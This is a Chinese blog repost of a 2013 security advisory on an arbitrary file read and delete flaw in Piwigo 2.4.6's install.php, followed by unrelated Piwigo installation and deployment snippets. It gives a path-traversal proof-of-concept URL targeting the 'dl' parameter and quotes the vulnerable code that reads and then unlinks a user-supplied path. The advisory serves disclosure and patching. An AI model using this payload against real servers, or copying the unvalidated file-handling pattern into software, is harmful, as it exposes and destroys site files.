linux文件删除漏洞,Piwigo任意文件泄露和任意文件删除漏洞

最新推荐文章于 2021-06-03 14:19:09 发布
最新推荐文章于 2021-06-03 14:19:09 发布
阅读量361 收藏
点赞数
文章标签: linux文件删除漏洞

发布日期:2013-02-18

更新日期:2013-02-21

受影响系统:

Piwigo Piwigo

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 58016

Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。

链接:http://packetstormsecurity.com/files/120380/Piwigo-2.4.6-Arbitrary-File-Read-Delete.html

http://osvdb.org/show/osvdb/90357

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/piwigo/install.php?dl=../../../../../../lio_passwords.txt

====================================================================

/install.php:

-------------

113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))

114: {

115:  $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];

116:  header('Cache-Control: no-cache, must-revalidate');

117:  header('Pragma: no-cache');

118:  header('Content-Disposition: attachment; filename="database.inc.php"');

119:  header('Content-Transfer-Encoding: binary');

120:  header('Content-Length: '.filesize($filename));

121:  echo file_get_contents($filename);

122:  unlink($filename);

123:  exit();

124: }

====================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)

Apache 2.4.2 (Win32)

PHP 5.4.4

MySQL 5.5.25a

建议:

--------------------------------------------------------------------------------

厂商补丁:

Piwigo

------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://piwigo.org/bugs/view.php?id=28430b1331709591d260c1c78e86d0c51c18.png

weixin_39912566
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
piwigo-videojs安装说明和必须安装的软件
03-13
Piwigo是一款免费开源使用的多功能图库软件,该软件基于最新的MySQL5与PHP5编程语言开发,性能强大,为用户提供了高效便捷的图片管理功能,用户可根据图片的拍摄时间,类型等信息对其进行分类,还可以手机同步。我这里介绍的是piwigo-videojs,视频插件,我在安装时候走了很多弯路,这里先说下 Piwigo 11.3.0 是支持本插件的 php.ini需要开启 system,putenv,shell_exec 这三个权限 视频生成缩略图,由于主机设置PHP程序执行时间比较短,需要在 plugins\piwigo-videojs\include\function_sync2.php 文件中加入set_time_limit(0);语句 后台插件-LocalFiles Editor-设置-本地配置中需要加入一下参数 $conf['sync_chars_regex'] = '/^[a-zA-Z0-9-_.\x00-\xff]+$/'; $conf['show_exif'] = true; $conf['show_exif_fields'] = array( 'Make', 'Model', 'ExifVersion', 'Software', 'DateTimeOriginal', 'FNumber', 'ExposureBiasValue', 'FILE;FileSize', 'ExposureTime', 'Flash', 'ISOSpeedRatings', 'FocalLength', 'FocalLengthIn35mmFilm', 'WhiteBalance', 'ExposureMode', 'MeteringMode', 'ExposureProgram', 'LightSource', 'Contrast', 'Saturation', 'Sharpness', 'bitrate', 'channel', 'date_creation', 'display_aspect_ratio', 'duration', 'filesize', 'format', 'formatprofile', 'codecid', 'frame_rate', 'latitude', 'longitude', 'make', 'model', 'playtime_seconds', 'sampling_rate', 'type', 'resolution', 'rotation', ); $conf['vjs_mediainfo_dir'] = 'D:\MediaInfo\MediaInfo.exe '; $conf['vjs_exiftool_dir'] = 'D:\exiftool\"exiftool.exe" '; $conf['vjs_ffprobe_dir'] = 'D:\ffmpeg\bin\ffprobe.exe '; $conf['ffmpeg_dir'] = 'D:\ffmpeg\bin\ffmpeg.exe '; 最后的参数是安装piwigo-videojs插件的必须软件,并且需要指出安装位置,如果您已经把参数写到变量里面,可以不用理会直接删除就可以了,注意,在EXE后面有空格,否则执行脚本会出错。 设置环境变量,windows服务器,我的电脑或者此电脑-右键属性-高级-环境变量-找到系统变量,里面变量为PATH-编辑 添加D:\MediaInfo到系统变量(PATH) 添加D:\exiftool到系统变量(PATH) 添加D:\ffmpeg\bin到系统变量(PATH) 在插件里面的piwigo-videojs设置需要提前设置好,在插件里面的同步是没用的,我测试好几次都不能同步数据和生成缩略图和海报 视频不能直接网页上传,需要用FTP上传到galleries目录 例如你要上传 wenhua.mp4 到galleries目录,你需要在galleries目录新建一个英文目录(千万别是中文文件夹或者文件名后期会出错的),上传好后,进网页后台,面板最下面有个 快速本地同步 ,别的同步都不起作用。同步好后,点图片-批量管理,选择您的视频,下面有个操作,选择videojs,需要生成缩略图的自己选择下,然后点执行操作就可以了。 还有个问题,第一次生成海报,你要是第二次在生成海报,前台海报不会变,你需要到 _data\i\galleries\视频目录\pwg_representative 删除这个目录下xxxx-cu_e250.jpg文件,然后刷新下前台
Piwigo 开源相册系统-PHP
06-20
<p>Piwigo是一个基于MySQL5与PHP5开发的相册系统。提供基本的发布和管理照片功能,按多种方式浏览如类别,标签,时间等。</p><p>2.5版本在技术及功能方面均有提升,从全新的图标到群组管理,以及三方认证,诸如:OpenID 或 Wordpress.com。 </p><p>Piwigo 2.5 数据: 30+ 新功能, 由百名翻译人员及7名开发人员带来的 900+ 代码变更, 4种新增语言使 Piwigo 的语言种类增至 51种,8个月的开发时间。</p><p> </p><p>产品特点:</p><p>上传你的照片</p><p>您可以使用Web表单,任何FTP客户端或桌面应用程序(例如digiKam,Shotwell,Lightroom或移动应用程序)添加照片。</p><p>批次管理员</p><p>从收藏夹中筛选照片,进行选择并批量应用操作:更改作者,添加一些标签,关联到新相册,设置地理位置...</p><p>在地图上定位您的照片</p><p>Piwigo可以从嵌入式元数据中读取GPS纬度和经度。然后,借助Google Maps或OpenStreetMap插件,Piwigo可以在交互式地图上显示您的照片。</p><p>全屏幻灯片</p><p>使用Fotorama插件或特定主题(例如Bootstrap Darkroom),您可以体验全屏幻灯片显示。</p><p>用户管理</p><p>管理员可以创建用户,组,管理权限并发送通知。几个管理员可以在Piwigo中同时工作。非常适合您的团队!</p>
Piwigo 开源相册系统 v2.9.3
11-07
Piwigo是一个基于MySQL5与PHP5开发的相册系统。提供基本的发布和管理照片功能,按多种方式浏览如类别,标签,时间等。 2.5版本在技术及功能方面均有提升,从全新的图标到群组管理,
Piwigo照片库 2.9.3.zip
05-23
Piwigo是由用户和开发人员的活跃社区构建的用于网络的照片库软件,Piwigo有非常简单的安装界面和管理面板,具有强大的功能来发布和管理您的图片。 Piwigo 2.9.3 更新日志:2018-02-24#767通过Shotwell 0.22.0发布,Piwigo 2.9.1失败;#789能够避免登录页面出现错误信息;#777 WS类别getImages,TotalCount;#787 password.php的意外“动作”显示错误;#723在请求私人身份证号码时,会显示永久链接;#747 PHP更改管理页面主题时的通知;#760从picture_modify更改日期创建时不刷新;#678 PHP 7 RSS错误;#751无法运行install/piwigo_structure-mysql.sql两次;#755同步元数据为Mysql 5.7发送日期创建不正确;#731仪表板,缺少照片数量;#739 [搜索]当搜索字词也匹配标签;#732重命名音译功能;#726触发相册创作;#725从HTML保护pwg.images.setInfo;第724页SQL注入页面cat_options;#721通过CSRF和不正确的权限将管理员私人相册设置为public;#713更新通知邮件在法语/英语混合;#710输入参数“redirect_decoded”无效。
Piwigo 开源相册系统 v2.8.1
12-10
Piwigo是一个基于MySQL5与PHP5开发的相册系统。提供基本的发布和管理照片功能,按多种方式浏览如类别,标签,时间等。 2.5版本在技术及功能方面均有提升,从全新的图标到群组管理,以及三方认证,诸如:OpenID 或 Wordpress.com。 Piwigo 2.5 数据: 30+ 新
piwigo_gallery:使用MariaDB的Alpine Linux容器中的Piwigo 2.10.2
02-22
piwigo_gallery 在Alpine Linux,Apache 2.4,PHP 7和带有MariaDB的外部容器中使用Piwigo 2.10.2 使用最新版本的Piwigo Gallery构建自己的容器 在本地克隆存储库(git clone ) 获取最新版本的Piwigo Gallery( ) 将ZIP文件内容解压缩到文件夹www 运行容器构建(docker build -t piwigo_fallery。) 运行piwigo_gallery 如果您构建了自己的映像,请用自己的映像名称替换docker-build.yaml文件中的源映像(image:svokac / gallery_web:latest 运行'./setup.sh'进行初始变量设置 运行'docker-compose up -d' 运行'docker-compose start'
linux文件删除漏洞,OpenStack Glance v1 API任意文件删除漏洞(CVE-2012-4573)
weixin_39601794的博客
05-07 99
发布日期:2012-11-08更新日期:2012-11-13受影响系统:openstack Glance Grizzlyopenstack Glance Essex (2012.1)openstack Glance Folsom (2012.2)描述:-------------------------------------------------------------------------...
[PHP代码审计]Piwigo11.4.0存在SQL注入漏洞
Y4tacker的博客
06-03 992
文章目录Piwigo11.4.0存在SQL注入漏洞写在前面分析 Piwigo11.4.0存在SQL注入漏洞 写在前面 国内的不够玩了,玩玩国外的,不过刚找到一个最后告诉我,被交了,好吧为了高大一点教大家一个收集自己装备库的方法 分析 我们查看提交记录,点我直达,发现有一个fix是关于sql注入的 那么我们安装好以后去看一眼,首先是首行的两个参数过滤 觉得很好玩给大家看一眼 限制为数字,好了不多吹牛逼了,看下面正题 首先是接收order参数保证二维数组的[0][column]有值并赋值给变量$col,
php 访问 ws,Piwigo 'ws.php'跨站请求伪造漏洞
weixin_42202078的博客
03-18 352
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html lang="en"><head><title>Piwigo 2.6.1</title></head><body><form action="http://localhost...
任意文件删除的一个总结
aihuochou9723的博客
08-05 444
这两天看了两三个任意文件删除的洞。说实话任意文件删除还算是比较好分析的一个漏洞漏洞的成因主要就是删除的目录路径是我们可控的,且并没有对这个路径进行任何的限制。 php常见的删除命令比如rmdir和unlink这种,如果后面跟的是一个可控的变量就很容易导致这个漏洞。 像我看以前phpcms爆出的一个任意文件删除,这个洞简直随意到让人觉得不是phpcms public funct...
simple-theme-piwigo:piwigo的简单主题
04-09
Piwigo的SimpleNG主题 SimpleNG是对Simple Gray主题的完整重新设计,它利用了Web的新功能(HTML5和CSS3)并基于Bootstrap。 上仍然可以使用旧版本( Simple Grey ),并且由Piwigo团队进行维护。 特征 React灵敏 HTML5和CSS3, 使用, 使用Open Sans字体。 下载 在Piwigo的管理界面中使用内置的主题管理器, 或下载档案并将其解压缩到your-gallery/theme/simpleng/ 。 执照 该主题是根据GNU通用公共许可证许可的。 有关详细信息,请参见许可。 定制 该主题基于的引导资源。 要对其进行自定义,必须安装一些。 简而言之,先安装nodejs,然后再npm install recess uglify-js安装uglify npm install recess uglify-js 。
Piwigo 开源相册系统 v11.4.0
04-23
Piwigo 开源相册系统简介Piwigo是一个PHP开源图片管理系统,Piwigo带有非常简单的安装界面和管理面板的,Piwigo它具有强大的功能来发布和管理您的图片。扩展使Piwigo轻松定制,锦上添花。Piwigo的特点可设置自由或限制图片访问,角色/用户管理,多服务器支持,支持用户评论,采用HTML模板控制界面外观,多语言支持,一个RSS通知Feed,EXIF和IPTC元数据管理,多目录支持(每一张图片可以同时属于多个目录),所有Web页面都兼容W3C规范。Piwigo 开源相册系统前台页面 Piwigo 开源相册系统后台管理后台路径:域名/admin.php用户名与密码:admin(安装时可设置)后台页面
PHP弱类型比较漏洞,PHP弱类型引发的漏洞实例
weixin_36122809的博客
03-11 277
【非原创】我们知道PHP 是一门弱类型语言,不必向 PHP 声明该变量的数据类型,PHP 会根据变量的值,自动把变量的值转换为正确的数据类型,但在这个转换过程中就有可能引发一些安全问题。类型转换会先进行类型转换,再进行对比会先比较类型,如果类型不同直接返回false,参考如下注意:当一个字符串被当作一个数值来取值,其结果和类型如下:如果该字符串没有包含’.',’e',’E'并且其数值值在整形的范围...
Piwigo照片管理平台的安装与使用总结
热门推荐
简单快乐
09-12 1万+
经过简单调研,从Piwigo和Lychee中选择安装Piwigo。 另外还有一款PhotoPrism目前还在开发之中,先不考虑了。 安装 根据github主页, 先安装需求条件: nginx 安装nginx: sudo yum install nginx 启动nginx: sudo systemctl start nginx.service 然后访问你的ip或域名就可以看到Nginx的默认页面,说...
Piwigo 一款开源的图片管理系统PHP源码
php源码
04-25 3226
介绍: Piwigo是一个PHP开源图片管理系统,系统拥有多款主题风格,提供200多种插件和主题,可以直接通过网站后台安装,类似于Wordpress可以在后台安装插件、主题、管理用户、选项设置等等! 使用安装: 将程序源码解压至网站根目录根据提示配置即可! 安装环境: 网络服务器(建议使用Apache或Nginx) PHP 5.3或更高版本(建议7+) MySQL 5或更高版本或等效的MariaDB ImageMagick(推荐)或PHP GD 源码特性: 上传:可以通过站点、FTP客户端、桌面应用程
STM32H562实现FreeRTOS内存管理【支持STM32H系列单片机】.zip
最新发布
06-03
STM32H562 FreeRTOS驱动程序,支持STM32H系列单片机。 项目代码可直接运行~
恶魔轮盘.cpp
06-03
恶魔轮盘
基于C++&OPENCV 的全景图像拼接.zip
06-03
基于C++&OPENCV 的全景图像拼接 C++是一种广泛使用的编程语言,它是由Bjarne Stroustrup于1979年在新泽西州美利山贝尔实验室开始设计开发的。C++是C语言的扩展,旨在提供更强大的编程能力,包括面向对象编程和泛型编程的支持。C++支持数据封装、继承和多态等面向对象编程的特性和泛型编程的模板,以及丰富的标准库,提供了大量的数据结构和算法,极大地提高了开发效率。12 C++是一种静态类型的、编译式的、通用的、大小写敏感的编程语言,它综合了高级语言和低级语言的特点。C++的语法与C语言非常相似,但增加了许多面向对象编程的特性,如类、对象、封装、继承和多态等。这使得C++既保持了C语言的低级特性,如直接访问硬件的能力,又提供了高级语言的特性,如数据封装和代码重用。13 C++的应用领域非常广泛,包括但不限于教育、系统开发、游戏开发、嵌入式系统、工业和商业应用、科研和高性能计算等领域。在教育领域,C++因其结构化和面向对象的特性,常被选为计算机科学和工程专业的入门编程语言。在系统开发领域,C++因其高效性和灵活性,经常被作为开发语言。游戏开发领域中,C++由于其高效性和广泛应用,在开发高性能游戏和游戏引擎中扮演着重要角色。在嵌入式系统领域,C++的高效和灵活性使其成为理想选择。此外,C++还广泛应用于桌面应用、Web浏览器、操作系统、编译器、媒体应用程序、数据库引擎、医疗工程和机器人等领域。16 学习C++的关键是理解其核心概念和编程风格,而不是过于深入技术细节。C++支持多种编程风格,每种风格都能有效地保证运行时间效率和空间效率。因此,无论是初学者还是经验丰富的程序员,都可以通过C++来设计和实现新系统或维护旧系统。3
docker部署piwigo
12-18
要使用Docker部署Piwigo,首先需要安装Docker引擎。Docker引擎是一种容器化平台,可以轻松地部署和管理应用程序。以下是部署Piwigo的步骤: 第一步是通过Docker Hub下载Piwigo镜像。可以使用以下命令: ``` docker pull piwigo ``` 这将从Docker Hub下载最新的Piwigo镜像。 下一步是创建一个数据卷,用于存储Piwigo的配置和图像。可以使用以下命令创建一个名为piwigo_data的数据卷: ``` docker volume create piwigo_data ``` 接下来,需要创建一个Docker容器来运行Piwigo。可以使用以下命令: ``` docker run -d -p 80:80 -v piwigo_data:/var/www/html --name piwigo_container piwigo ``` 此命令将在后台运行一个名为piwigo_container的Docker容器,并将主机的80端口映射到容器的80端口。同时,piwigo_data数据卷将被挂载到容器的/var/www/html目录,用于存储配置和图像。 现在,Piwigo已经在Docker容器中运行,可以通过浏览器访问它。在浏览器中输入服务器的IP地址或域名即可访问Piwigo的安装页面。 在安装页面上,需要提供数据库的连接信息。可以使用MySQL或MariaDB作为数据库后端,可以设置数据库的IP地址、端口、用户名、密码和数据库名称。 完成安装后,就可以开始使用Piwigo了。可以上传照片、创建相册,并使用Piwigo的各种功能来管理和共享照片。 总结一下,使用Docker部署Piwigo可以简化部署过程,并且可以轻松地在不同环境中进行部署和迁移。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值